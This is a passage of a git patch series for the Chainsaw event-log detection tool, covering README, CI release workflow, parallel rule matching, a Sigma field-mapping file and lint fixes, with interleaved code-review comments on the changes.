@@ -142,14 +142,26 @@ In addition to supporting sigma rules, Chainsaw also supports a custom rule form ## Quick Start Guide ### Downloading and Running -You can find pre-compiled versions of chainsaw in the [releases section](https://github.com/countercept/chainsaw/releases) of this Github repo, or you can clone the repo (and the submodules) by running: - `git clone --recurse-submodules https://github.com/countercept/chainsaw.git` -You can then compile the code yourself by running: `cargo build --release`. Once the build has finished, you will find a copy of the compiled binary in the target/release folder. +With the release of Chainsaw v2, we decided to no longer include the Sigma Rules and EVTX-Attack-Samples repositories as Chainsaw submodules. We recommend that you clone these repositories separately to ensure you have the latest versions. + +If you still need an all-in-one package containing the Chainsaw binary, Sigma rules and example Event logs, you can download it from the [releases section](https://github.com/countercept/chainsaw/releases) section of this Github repo. In this releases section you will also find pre-compiled binary-only versions of Chainsaw for various platforms and architectures. + +If you want to compile Chainsaw yourself, you can clone the Chainsaw repo: + + `git clone https://github.com/countercept/chainsaw.git` + +and compile the code yourself by running: `cargo build --release`. Once the build has finished, you will find a copy of the compiled binary in the target/release folder. 
**Make sure to build with the `--release` flag as this will ensure significantly faster execution time.** -If you want to quickly see what Chainsaw looks like when it runs, you can use the command: +If you want to quickly see what Chainsaw looks like when it runs, you can clone the [Sigma Rules](https://github.com/SigmaHQ/sigma) and [EVTX-Attack-Samples](https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES) repositories: + +``` +git clone https://github.com/SigmaHQ/sigma +git clone https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES.git +``` +and then run Chainsaw with the parameters below: ``` ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml ``` From d24709be136a4d2be6de99ab23607663ec21ae9f Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Thu, 7 Jul 2022 00:09:02 +0100 Subject: [PATCH 60/77] chore: updating v2 workflow to create unified zip --- .github/workflows/v2.yml | 98 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 98 insertions(+) diff --git a/.github/workflows/v2.yml b/.github/workflows/v2.yml index 35928658..2da6b3bd 100644 --- a/.github/workflows/v2.yml +++ b/.github/workflows/v2.yml @@ -28,6 +28,14 @@ jobs: - name: Build run: cargo build --all --release --target x86_64-unknown-linux-gnu && strip target/x86_64-unknown-linux-gnu/release/chainsaw + - name: Upload binary artifact + uses: actions/upload-artifact@v3 + with: + name: linux-binary + path: target/x86_64-unknown-linux-gnu/release/chainsaw + if-no-files-found: error + retention-days: 1 + - name: Move files to artifacts run: mv target/x86_64-unknown-linux-gnu/release/chainsaw mappings LICENCE README.md chainsaw/ 
@@ -65,6 +73,14 @@ jobs: - name: Build run: cargo build --all --release --target x86_64-unknown-linux-musl && strip target/x86_64-unknown-linux-musl/release/chainsaw + - name: Upload binary artifact + uses: actions/upload-artifact@v3 + with: + name: linux-static-binary + path: target/x86_64-unknown-linux-musl/release/chainsaw + if-no-files-found: error + retention-days: 1 + - name: Move files to artifacts run: mv target/x86_64-unknown-linux-musl/release/chainsaw mappings LICENCE README.md chainsaw/ @@ -98,6 +114,14 @@ jobs: - name: Build run: cargo build --all --release + - name: Upload binary artifact + uses: actions/upload-artifact@v3 + with: + name: win-binary + path: target/release/chainsaw.exe + if-no-files-found: error + retention-days: 1 + - name: Create artifacts directory run: mkdir chainsaw @@ -139,6 +163,14 @@ jobs: - name: Build for mac run: cargo build --all --release && strip target/release/chainsaw + - name: Upload binary artifact + uses: actions/upload-artifact@v3 + with: + name: mac-binary + path: target/release/chainsaw + if-no-files-found: error + retention-days: 1 + - name: Move files to artifacts run: mv target/release/chainsaw mappings LICENCE README.md chainsaw/ 
@@ -152,3 +184,69 @@ jobs: files: chainsaw_x86_64-apple-darwin.zip env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + build-complete: + needs: [build-linux, build-linux-static, build-win, build-mac] + runs-on: ubuntu-latest + + steps: + - name: Create artifacts directory + run: mkdir chainsaw + + - name: Checkout + uses: actions/checkout@v2 + with: + path: ./chainsaw-root + + - name: Checkout Sigma Repo + uses: actions/checkout@v3 + with: + repository: SigmaHQ/sigma + path: ./sigma + + - name: Checkout EVTX Samples Repo + uses: actions/checkout@v3 + with: + repository: sbousseaden/EVTX-ATTACK-SAMPLES + path: ./EVTX-ATTACK-SAMPLES + + - name: Move files to artifacts + run: mv sigma EVTX-ATTACK-SAMPLES chainsaw/ + + - name: Download build-linux binary + uses: actions/download-artifact@v3 + with: + name: linux-binary + path: ./chainsaw-linux + + - name: Download build-linux-static binary + uses: actions/download-artifact@v3 + with: + name: linux-static-binary + path: ./chainsaw-linux-static + + - name: Download build-win binary + uses: actions/download-artifact@v3 + with: + name: win-binary + path: ./chainsaw-win + + - name: Download build-mac binary + uses: actions/download-artifact@v3 + with: + name: mac-binary + path: ./chainsaw-mac + + - name: build zip file content + run: mv ./chainsaw-linux/chainsaw ./chainsaw/chainsaw_x86_64-unknown-linux-gnu; mv ./chainsaw-linux-static/chainsaw ./chainsaw/chainsaw_x86_64-unknown-linux-mus; mv ./chainsaw-win/chainsaw.exe ./chainsaw/chainsaw_x86_64-pc-windows-msvc.exe; mv ./chainsaw-mac/chainsaw ./chainsaw/chainsaw_x86_64-apple-darwin ; mv ./chainsaw-root/mappings ./chainsaw-root/LICENCE ./chainsaw-root/README.md ./chainsaw-root/rules/ ./chainsaw/ + + - name: Create ZIP File + run: tar -czf chainsaw_all_platforms+rules+examples.tar.gz chainsaw/* + + - name: Release + uses: softprops/action-gh-release@v1 + if: startsWith(github.ref, 'refs/tags/') + with: + files: chainsaw_all_platforms+rules+examples.tar.gz + env: + GITHUB_TOKEN: 
${{ secrets.GITHUB_TOKEN }} From 272b7939a0b96223bebce6cbc8cd55771e83c3f5 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Thu, 7 Jul 2022 10:42:58 +0100 Subject: [PATCH 61/77] feat: enable multi threading for group hunts --- src/hunt.rs | 93 ++++++++++++++++++++++++++++++++--------------------- 1 file changed, 57 insertions(+), 36 deletions(-) diff --git a/src/hunt.rs b/src/hunt.rs index 90a573d8..d3a47d66 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -8,6 +8,7 @@ use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; use chrono_tz::Tz; // https://github.com/rust-lang/rust/issues/74465 use once_cell::unsync::OnceCell; +use rayon::prelude::*; use serde::{Deserialize, Serialize}; use serde_json::Value as Json; use tau_engine::{ 
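Review bot: The `build zip file content` step in the new `build-complete` job renames the static binary to `./chainsaw/chainsaw_x86_64-unknown-linux-mus`, dropping the final `l` of the target triple that the sibling artifacts (`chainsaw_x86_64-unknown-linux-gnu`, `chainsaw_x86_64-apple-darwin`) spell out in full; the command should end `./chainsaw/chainsaw_x86_64-unknown-linux-musl`. The job also mixes `actions/checkout@v2` for the Chainsaw checkout with `actions/checkout@v3` for the two third-party repositories, and every third-party action here (including `softprops/action-gh-release@v1`, which publishes the release asset) is referenced by a mutable tag; using one checkout version and pinning to full commit SHAs would make this release job reproducible and narrow its supply-chain exposure. Finally, the `Create ZIP File` step runs `tar -czf` and emits `chainsaw_all_platforms+rules+examples.tar.gz`, so the step name should say tarball rather than ZIP.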
@@ -454,45 +455,65 @@ impl Hunter { kind, } => { if tau_engine::core::solve(filter, &mapped) { - for (rid, rule) in &self.inner.rules { - if !rule.is_kind(kind) { - continue; - } - if exclusions.contains(rule.name()) { - continue; - } - let hit = rule.solve(&mapped); - if hit { - if let Some(aggregate) = &rule.aggregate() { - files.insert(document_id, (document.clone(), timestamp)); - let mut hasher = DefaultHasher::new(); - let mut skip = false; - for field in &aggregate.fields { - if let Some(value) = - mapped.find(field).and_then(|s| s.to_string()) - { - value.hash(&mut hasher); - } else { - skip = true; - break; - } + let matches = &self + .inner + .rules + .par_iter() + .filter_map(|(rid, rule)| { + // NOTE: Needed as Document is not Sync + let wrapper; + let mapped = match &document { + File::Evtx(evtx) => { + wrapper = crate::evtx::Wrapper(&evtx.data); + hunt.mapper.mapped(&wrapper) } - if skip { - continue; - } - let id = hasher.finish(); - let aggregates = aggregates - .entry((hunt.id, *rid)) - .or_insert((aggregate, HashMap::new())); - let docs = aggregates.1.entry(id).or_insert(vec![]); - docs.push(document_id); + File::Json(json) => hunt.mapper.mapped(json), + File::Xml(xml) => hunt.mapper.mapped(xml), + }; + + if !rule.is_kind(kind) { + return None; + } + if exclusions.contains(rule.name()) { + return None; + } + if rule.solve(&mapped) { + Some((*rid, rule)) } else { - hits.push(Hit { - hunt: hunt.id, - rule: *rid, - timestamp, - }); + None + } + }) + .collect::>(); + for (rid, rule) in matches { + if let Some(aggregate) = &rule.aggregate() { + files.insert(document_id, (document.clone(), timestamp)); + let mut hasher = DefaultHasher::new(); + let mut skip = false; + for field in &aggregate.fields { + if let Some(value) = + mapped.find(field).and_then(|s| s.to_string()) + { + value.hash(&mut hasher); + } else { + skip = true; + break; + } + } + if skip { + continue; } + let id = hasher.finish(); + let aggregates = aggregates + .entry((hunt.id, *rid)) + 
.or_insert((aggregate, HashMap::new())); + let docs = aggregates.1.entry(id).or_insert(vec![]); + docs.push(document_id); + } else { + hits.push(Hit { + hunt: hunt.id, + rule: *rid, + timestamp, + }); } } } From aa098ce853748c0dfd6f6a3c6a914e047bc51062 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Thu, 7 Jul 2022 13:12:52 +0100 Subject: [PATCH 62/77] chore: add warning message on high rule fail count --- src/main.rs | 3 +++ 1 file changed, 3 insertions(+) diff --git a/src/main.rs b/src/main.rs index 6990d7de..6c093b44 100644 --- a/src/main.rs +++ b/src/main.rs @@ -342,6 +342,9 @@ fn run() -> Result<()> { } } } + if failed > 500 && sigma.is_empty() { + cs_eyellowln!("[!] {} rules failed to load, ensure Sigma rule paths are specified with the '-s' flag", failed); + } if count == 0 { return Err(anyhow::anyhow!( "No valid detection rules were found in the provided paths", From 90579ef08538ba6445c235cb6449078f708dda83 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Thu, 7 Jul 2022 13:17:59 +0100 Subject: [PATCH 63/77] feat: add a global sigma mapping --- mappings/sigma-event-logs-all.yml | 497 ++++++++++++++++++++++++++++++ 1 file changed, 497 insertions(+) create mode 100644 mappings/sigma-event-logs-all.yml diff --git a/mappings/sigma-event-logs-all.yml b/mappings/sigma-event-logs-all.yml new file mode 100644 index 00000000..2311274a --- /dev/null +++ b/mappings/sigma-event-logs-all.yml 
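Review bot: Inside the new `par_iter().filter_map` closure the document is re-mapped via `hunt.mapper.mapped(...)` before the `rule.is_kind(kind)` and `exclusions.contains(rule.name())` guards run, so the per-rule mapping — which the `// NOTE: Needed as Document is not Sync` comment already concedes is repeated for every rule — is also paid for rules that are immediately discarded. Moving the two guard clauses to the top of the closure, ahead of the `let wrapper;` / `let mapped = match &document` block, preserves behaviour and removes that cost; the reordered closure is sketched below. Separately, `let matches = &self.inner.rules.par_iter()...collect::<Vec<_>>()` borrows a temporary only to iterate it by reference; dropping the leading `&` and writing `for (rid, rule) in matches` with `rid` in place of `*rid` reads more directly. Whether the parallel solve outweighs remapping the document once per rule for small rule sets is worth measuring rather than assuming. The enclosing `impl Hunter` method starts and ends outside the hunk.
```rust
.filter_map(|(rid, rule)| {
    // Cheap rejections first so excluded rules never pay for a remap.
    if !rule.is_kind(kind) {
        return None;
    }
    if exclusions.contains(rule.name()) {
        return None;
    }
    // NOTE: Needed as Document is not Sync
    let wrapper;
    let mapped = match &document {
        // … unchanged: File::Evtx / File::Json / File::Xml arms …
    };
    // … unchanged: rule.solve(&mapped) -> Some((*rid, rule)) / None …
})
```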
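Review bot: The new warning in `run()` keys off a bare `500` with nothing explaining where the threshold comes from or why `sigma.is_empty()` is part of the condition; a named constant or a comment such as `// Heuristic: this many load failures with no -s path usually means Sigma rules were passed as Chainsaw rules` would tell the next reader what the check is detecting. As written, a smaller set of mis-specified rules presumably produces no hint at all and falls through to the later "No valid detection rules" error or a partial hunt, so the comment should also say that the threshold is deliberate. `run()` starts and ends outside the hunk.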
@@ -0,0 +1,497 @@
+---
+name: Chainsaw's groupless Sigma mappings for Event Logs
+kind: evtx
+rules: sigma
+
+groups:
+ - name: Sigma
+ timestamp: Event.System.TimeCreated
+ filter:
+ Provider: "*"
+ fields:
+ - from: Provider
+ to: Event.System.Provider
+ - name: Event ID
+ from: EventID
+ to: Event.System.EventID
+ - name: Record ID
+ from: EventRecordID
+ to: Event.System.EventRecordID
+ - name: Computer
+ from: Computer
+ to: Event.System.Computer
+
+ - from: AccessList
+ to: Event.EventData.AccessList
+ visible: false
+ - from: AccessMask
+ to: Event.EventData.AccessMask
+ visible: false
+ - from: Accesses
+ to: Event.EventData.Accesses
+ visible: false
+ - from: AccountName
+ to: Event.EventData.AccountName
+ visible: false
+ - from: Action
+ to: Event.EventData.Action
+ visible: false
+ - from: Address
+ to: Event.EventData.Address
+ visible: false
+ - from: AllowedToDelegateTo
+ to: Event.EventData.AllowedToDelegateTo
+ visible: false
+ - from: Application
+ to: Event.EventData.Application
+ visible: false
+ - from: ApplicationPath
+ to: Event.EventData.ApplicationPath
+ visible: false
+ - from: AttributeLDAPDisplayName
+ to: Event.EventData.AttributeLDAPDisplayName
+ visible: false
+ - from: AttributeValue
+ to: Event.EventData.AttributeValue
+ visible: false
+ - from: AuditPolicyChanges
+ to: Event.EventData.AuditPolicyChanges
+ visible: false
+ - from: AuditSourceName
+ to: Event.EventData.AuditSourceName
+ visible: false
+ - from: AuthenticationPackageName
+ to: Event.EventData.AuthenticationPackageName
+ visible: false
+ - from: CallTrace
+ to: Event.EventData.CallTrace
+ visible: false
+ - from: CallerProcessName
+ to: Event.EventData.CallerProcessName
+ visible: false
+ - from: Caption
+ to: Event.EventData.Caption
+ visible: false
+ - from: CertThumbprint
+ to: Event.EventData.CertThumbprint
+ visible: false
+ - from: Channel
+ to: Event.EventData.Channel
+ visible: false
+ - from: ClassName
+ to: Event.EventData.ClassName
+ visible: false
+ - from: CommandLine
+ to: Event.EventData.CommandLine
+ visible: false
+ - from: Commandline
+ to: Event.EventData.Commandline
+ visible: false
+ - from: Company
+ to: Event.EventData.Company
+ visible: false
+ - from: ContextInfo
+ to: Event.EventData.ContextInfo
+ visible: false
+ - from: CurrentDirectory
+ to: Event.EventData.CurrentDirectory
+ visible: false
+ - from: Description
+ to: Event.EventData.Description
+ visible: false
+ - from: DestAddress
+ to: Event.EventData.DestAddress
+ visible: false
+ - from: DestPort
+ to: Event.EventData.DestPort
+ visible: false
+ - from: Destination
+ to: Event.EventData.Destination
+ visible: false
+ - from: DestinationHostname
+ to: Event.EventData.DestinationHostname
+ visible: false
+ - from: DestinationIp
+ to: Event.EventData.DestinationIp
+ visible: false
+ - from: DestinationIsIpv6
+ to: Event.EventData.DestinationIsIpv6
+ visible: false
+ - from: DestinationPort
+ to: Event.EventData.DestinationPort
+ visible: false
+ - from: Details
+ to: Event.EventData.Details
+ visible: false
+ - from: Device
+ to: Event.EventData.Device
+ visible: false
+ - from: DeviceDescription
+ to: Event.EventData.DeviceDescription
+ visible: false
+ - from: DeviceName
+ to: Event.EventData.DeviceName
+ visible: false
+ - from: EngineVersion
+ to: Event.EventData.EngineVersion
+ visible: false
+ - from: ErrorCode
+ to: Event.EventData.ErrorCode
+ visible: false
+ - from: EventType
+ to: Event.EventData.EventType
+ visible: false
+ - from: FailureCode
+ to: Event.EventData.FailureCode
+ visible: false
+ - from: FileName
+ to: Event.EventData.FileName
+ visible: false
+ - from: FileVersion
+ to: Event.EventData.FileVersion
+ visible: false
+ - from: GrantedAccess
+ to: Event.EventData.GrantedAccess
+ visible: false
+ - from: Hashes
+ to: Event.EventData.Hashes
+ visible: false
+ - from: HiveName
+ to: Event.EventData.HiveName
+ visible: false
+ - from: HostApplication
+ to: Event.EventData.HostApplication
+ visible: false
+ - from: HostName
+ to: Event.EventData.HostName
+ visible: false
+ - from: HostVersion
+ to: Event.EventData.HostVersion
+ visible: false
+ - from: Image
+ to: Event.EventData.Image
+ visible: false
+ - from: ImageFileName
+ to: Event.EventData.ImageFileName
+ visible: false
+ - from: ImageLoaded
+ to: Event.EventData.ImageLoaded
+ visible: false
+ - from: ImagePath
+ to: Event.EventData.ImagePath
+ visible: false
+ - from: Imphash
+ to: Event.EventData.Imphash
+ visible: false
+ - from: Initiated
+ to: Event.EventData.Initiated
+ visible: false
+ - from: IntegrityLevel
+ to: Event.EventData.IntegrityLevel
+ visible: false
+ - from: IpAddress
+ to: Event.EventData.IpAddress
+ visible: false
+ - from: KeyLength
+ to: Event.EventData.KeyLength
+ visible: false
+ - from: Keywords
+ to: Event.EventData.Keywords
+ visible: false
+ - from: LayerRTID
+ to: Event.EventData.LayerRTID
+ visible: false
+ - from: Level
+ to: Event.EventData.Level
+ visible: false
+ - from: LocalName
+ to: Event.EventData.LocalName
+ visible: false
+ - from: LogonId
+ to: Event.EventData.LogonId
+ visible: false
+ - from: LogonProcessName
+ to: Event.EventData.LogonProcessName
+ visible: false
+ - from: LogonType
+ to: Event.EventData.LogonType
+ visible: false
+ - from: Message
+ to: Event.EventData.Message
+ visible: false
+ - from: ModifyingApplication
+ to: Event.EventData.ModifyingApplication
+ visible: false
+ - from: NewName
+ to: Event.EventData.NewName
+ visible: false
+ - from: NewTargetUserName
+ to: Event.EventData.NewTargetUserName
+ visible: false
+ - from: NewTemplateContent
+ to: Event.EventData.NewTemplateContent
+ visible: false
+ - from: NewUacValue
+ to: Event.EventData.NewUacValue
+ visible: false
+ - from: NewValue
+ to: Event.EventData.NewValue
+ visible: false
+ - from: ObjectClass
+ to: Event.EventData.ObjectClass
+ visible: false
+ - from: ObjectName
+ to: Event.EventData.ObjectName
+ visible: false
+ - from: ObjectServer
+ to: Event.EventData.ObjectServer
+ visible: false
+ - from: ObjectType
+ to: Event.EventData.ObjectType
+ visible: false
+ - from: ObjectValueName
+ to: Event.EventData.ObjectValueName
+ visible: false
+ - from: OldTargetUserName
+ to: Event.EventData.OldTargetUserName
+ visible: false
+ - from: OldUacValue
+ to: Event.EventData.OldUacValue
+ visible: false
+ - from: Origin
+ to: Event.EventData.Origin
+ visible: false
+ - from: OriginalFileName
+ to: Event.EventData.OriginalFileName
+ visible: false
+ - from: OriginalFilename
+ to: Event.EventData.OriginalFilename
+ visible: false
+ - from: OriginalName
+ to: Event.EventData.OriginalName
+ visible: false
+ - from: ParentCommandLine
+ to: Event.EventData.ParentCommandLine
+ visible: false
+ - from: ParentImage
+ to: Event.EventData.ParentImage
+ visible: false
+ - from: ParentUser
+ to: Event.EventData.ParentUser
+ visible: false
+ - from: PasswordLastSet
+ to: Event.EventData.PasswordLastSet
+ visible: false
+ - from: Path
+ to: Event.EventData.Path
+ visible: false
+ - from: Payload
+ to: Event.EventData.Payload
+ visible: false
+ - from: PipeName
+ to: Event.EventData.PipeName
+ visible: false
+ - from: PossibleCause
+ to: Event.EventData.PossibleCause
+ visible: false
+ - from: PrivilegeList
+ to: Event.EventData.PrivilegeList
+ visible: false
+ - from: ProcessId
+ to: Event.EventData.ProcessId
+ visible: false
+ - from: ProcessName
+ to: Event.EventData.ProcessName
+ visible: false
+ - from: Product
+ to: Event.EventData.Product
+ visible: false
+ - from: Properties
+ to: Event.EventData.Properties
+ visible: false
+ - from: ProviderName
+ to: Event.EventData.ProviderName
+ visible: false
+ - from: Provider_Name
+ to: Event.EventData.Provider_Name
+ visible: false
+ - from: QNAME
+ to: Event.EventData.QNAME
+ visible: false
+ - from: Query
+ to: Event.EventData.Query
+ visible: false
+ - from: QueryName
+ to: Event.EventData.QueryName
+ visible: false
+ - from: QueryResults
+ to: Event.EventData.QueryResults
+ visible: false
+ - from: QueryStatus
+ to: Event.EventData.QueryStatus
+ visible: false
+ - from: RelativeTargetName
+ to: Event.EventData.RelativeTargetName
+ visible: false
+ - from: RemoteAddress
+ to: Event.EventData.RemoteAddress
+ visible: false
+ - from: RemoteName
+ to: Event.EventData.RemoteName
+ visible: false
+ - from: SamAccountName
+ to: Event.EventData.SamAccountName
+ visible: false
+ - from: ScriptBlockText
+ to: Event.EventData.ScriptBlockText
+ visible: false
+ - from: SearchFilter
+ to: Event.EventData.SearchFilter
+ visible: false
+ - from: ServerName
+ to: Event.EventData.ServerName
+ visible: false
+ - from: Service
+ to: Event.EventData.Service
+ visible: false
+ - from: ServiceFileName
+ to: Event.EventData.ServiceFileName
+ visible: false
+ - from: ServiceName
+ to: Event.EventData.ServiceName
+ visible: false
+ - from: ServicePrincipalNames
+ to: Event.EventData.ServicePrincipalNames
+ visible: false
+ - from: ServiceStartType
+ to: Event.EventData.ServiceStartType
+ visible: false
+ - from: ServiceType
+ to: Event.EventData.ServiceType
+ visible: false
+ - from: ShareName
+ to: Event.EventData.ShareName
+ visible: false
+ - from: SidHistory
+ to: Event.EventData.SidHistory
+ visible: false
+ - from: Signed
+ to: Event.EventData.Signed
+ visible: false
+ - from: SourceAddress
+ to: Event.EventData.SourceAddress
+ visible: false
+ - from: SourceImage
+ to: Event.EventData.SourceImage
+ visible: false
+ - from: SourceIp
+ to: Event.EventData.SourceIp
+ visible: false
+ - from: SourcePort
+ to: Event.EventData.SourcePort
+ visible: false
+ - from: Source_Name
+ to: Event.EventData.Source_Name
+ visible: false
+ - from: StartAddress
+ to: Event.EventData.StartAddress
+ visible: false
+ - from: StartFunction
+ to: Event.EventData.StartFunction
+ visible: false
+ - from: StartModule
+ to: Event.EventData.StartModule
+ visible: false
+ - from: State
+ to: Event.EventData.State
+ visible: false
+ - from: Status
+ to: Event.EventData.Status
+ visible: false
+ - from: SubjectDomainName
+ to: Event.EventData.SubjectDomainName
+ visible: false
+ - from: SubjectLogonId
+ to: Event.EventData.SubjectLogonId
+ visible: false
+ - from: SubjectUserName
+ to: Event.EventData.SubjectUserName
+ visible: false
+ - from: SubjectUserSid
+ to: Event.EventData.SubjectUserSid
+ visible: false
+ - from: TargetFilename
+ to: Event.EventData.TargetFilename
+ visible: false
+ - from: TargetImage
+ to: Event.EventData.TargetImage
+ visible: false
+ - from: TargetLogonId
+ to: Event.EventData.TargetLogonId
+ visible: false
+ - from: TargetName
+ to: Event.EventData.TargetName
+ visible: false
+ - from: TargetObject
+ to: Event.EventData.TargetObject
+ visible: false
+ - from: TargetParentProcessId
+ to: Event.EventData.TargetParentProcessId
+ visible: false
+ - from: TargetPort
+ to: Event.EventData.TargetPort
+ visible: false
+ - from: TargetServerName
+ to: Event.EventData.TargetServerName
+ visible: false
+ - from: TargetSid
+ to: Event.EventData.TargetSid
+ visible: false
+ - from: TargetUserName
+ to: Event.EventData.TargetUserName
+ visible: false
+ - from: TargetUserSid
+ to: Event.EventData.TargetUserSid
+ visible: false
+ - from: TaskName
+ to: Event.EventData.TaskName
+ visible: false
+ - from: TemplateContent
+ to: Event.EventData.TemplateContent
+ visible: false
+ - from: TicketEncryptionType
+ to: Event.EventData.TicketEncryptionType
+ visible: false
+ - from: TicketOptions
+ to: Event.EventData.TicketOptions
+ visible: false
+ - from: Type
+ to: Event.EventData.Type
+ visible: false
+ - from: User
+ to: Event.EventData.User
+ visible: false
+ - from: UserName
+ to: Event.EventData.UserName
+ visible: false
+ - from: Value
+ to: Event.EventData.Value
+ visible: false
+ - from: Workstation
+ to: Event.EventData.Workstation
+ visible: false
+ - from: WorkstationName
+ to: Event.EventData.WorkstationName
+ visible: false
+ - from: param1
+ to: Event.EventData.param1
+ visible: false
+ - from: param2
+ to: Event.EventData.param2
+ visible: false
+ - from: 
processPath + to: Event.EventData.processPath + visible: false + - from: sha1 + to: Event.EventData.sha1 + visible: false From 4f92fd449772110147f15d7dbdb52c4d8a1a3ff0 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Thu, 7 Jul 2022 13:21:33 +0100 Subject: [PATCH 64/77] fix: swap some mappings to system --- mappings/sigma-event-logs-all.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/mappings/sigma-event-logs-all.yml b/mappings/sigma-event-logs-all.yml index 2311274a..cb072be3 100644 --- a/mappings/sigma-event-logs-all.yml +++ b/mappings/sigma-event-logs-all.yml @@ -76,7 +76,7 @@ groups: to: Event.EventData.CertThumbprint visible: false - from: Channel - to: Event.EventData.Channel + to: Event.System.Channel visible: false - from: ClassName to: Event.EventData.ClassName @@ -196,13 +196,13 @@ groups: to: Event.EventData.KeyLength visible: false - from: Keywords - to: Event.EventData.Keywords + to: Event.System.Keywords visible: false - from: LayerRTID to: Event.EventData.LayerRTID visible: false - from: Level - to: Event.EventData.Level + to: Event.System.Level visible: false - from: LocalName to: Event.EventData.LocalName From 61544f96e3cb33082a0ccaa28130939d16135f2c Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Thu, 7 Jul 2022 13:32:31 +0100 Subject: [PATCH 65/77] chore: fix clippy warnings --- src/cli.rs | 6 +++--- src/hunt.rs | 37 +++++++++++++++++-------------------- src/rule/chainsaw.rs | 3 +-- src/rule/mod.rs | 8 ++++---- src/rule/sigma.rs | 22 ++++++++++------------ 5 files changed, 35 insertions(+), 41 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index dc88a06e..d6f4f5f1 100644 --- a/src/cli.rs +++ b/src/cli.rs 
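Review bot: The single group's `filter: Provider: "*"` matches every event, so with this mapping a Sigma rule's `logsource` is never consulted and each rule is evaluated against any record that happens to expose the same field names — a rule written for one provider's process-creation events will also be tested against any other provider's records that carry `CommandLine`. That is presumably the intent of a "groupless" mapping, but nothing in the file says so or warns about the cross-channel false positives and the rules-times-events cost; a header comment such as `# Groupless: every Sigma rule is evaluated against every event regardless of its logsource; expect more hits and longer runs than sigma-event-logs.yml` would set expectations. The near-duplicate field names (`CommandLine`/`Commandline`, `OriginalFileName`/`OriginalFilename`) suggest lookups are case-sensitive; a one-line comment saying why both spellings are kept would stop someone from "deduplicating" them later.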
@@ -274,7 +274,7 @@ pub fn print_detections( (*hits).push(Hit { hunt, rule }); } for ((group, timestamp), mut hits) in hits { - hits.sort_by(|x, y| x.rule.name().cmp(&y.rule.name())); + hits.sort_by(|x, y| x.rule.name().cmp(y.rule.name())); let groups = groups.entry(group).or_insert(vec![]); (*groups).push(Grouping { kind: &detection.kind, @@ -446,7 +446,7 @@ pub fn print_detections( } else { cells.push(cell!(rules .iter() - .map(|rule| format!("{} {}", RULE_PREFIX, split_tag(&rule.name()))) + .map(|rule| format!("{} {}", RULE_PREFIX, split_tag(rule.name()))) .collect::>() .join("\n"))); } @@ -510,7 +510,7 @@ pub fn print_csv( (*hits).push(Hit { hunt, rule }); } for ((group, timestamp), mut hits) in hits { - hits.sort_by(|x, y| x.rule.name().cmp(&y.rule.name())); + hits.sort_by(|x, y| x.rule.name().cmp(y.rule.name())); let groups = groups.entry(group).or_insert(vec![]); (*groups).push(Grouping { kind: &detection.kind, diff --git a/src/hunt.rs b/src/hunt.rs index d3a47d66..4ec1101f 100644 --- a/src/hunt.rs +++ b/src/hunt.rs 
@@ -90,28 +90,25 @@ impl HunterBuilder { let mut hunts = vec![]; let rules = match self.rules { Some(mut rules) => { - rules.sort_by(|x, y| x.name().cmp(&y.name())); + rules.sort_by(|x, y| x.name().cmp(y.name())); let mut map = BTreeMap::new(); for rule in rules { let uuid = Uuid::new_v4(); - match &rule { - Rule::Chainsaw(rule) => { - let mapper = Mapper::from(rule.fields.clone()); - hunts.push(Hunt { - id: uuid, - - group: rule.group.clone(), - kind: HuntKind::Rule { - aggregate: rule.aggregate.clone(), - filter: rule.filter.clone(), - }, - timestamp: rule.timestamp.clone(), - - file: rule.kind.clone(), - mapper, - }); - } - _ => {} + if let Rule::Chainsaw(rule) = &rule { + let mapper = Mapper::from(rule.fields.clone()); + hunts.push(Hunt { + id: uuid, + + group: rule.group.clone(), + kind: HuntKind::Rule { + aggregate: rule.aggregate.clone(), + filter: rule.filter.clone(), + }, + timestamp: rule.timestamp.clone(), + + file: rule.kind.clone(), + mapper, + }); } map.insert(uuid, rule); } @@ -624,7 +621,7 @@ impl Hunter { pub fn extensions(&self) -> HashSet { let mut extensions = HashSet::new(); for rule in &self.inner.rules { - if let Some(e) = FileKind::extensions(&rule.1.types()) { + if let Some(e) = FileKind::extensions(rule.1.types()) { extensions.extend(e.iter().cloned()); } } diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs index d1e93137..0c66f65d 100644 --- a/src/rule/chainsaw.rs +++ b/src/rule/chainsaw.rs @@ -155,8 +155,7 @@ pub fn load(rule: &Path) -> crate::Result { Filter::Expression(expression) => Filter::Expression({ let expression = optimiser::shake(expression); let expression = optimiser::rewrite(expression); - let expression = optimiser::matrix(expression); - expression + optimiser::matrix(expression) }), }; Ok(rule) diff --git a/src/rule/mod.rs b/src/rule/mod.rs index cdc0d52e..8ef8d219 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs 
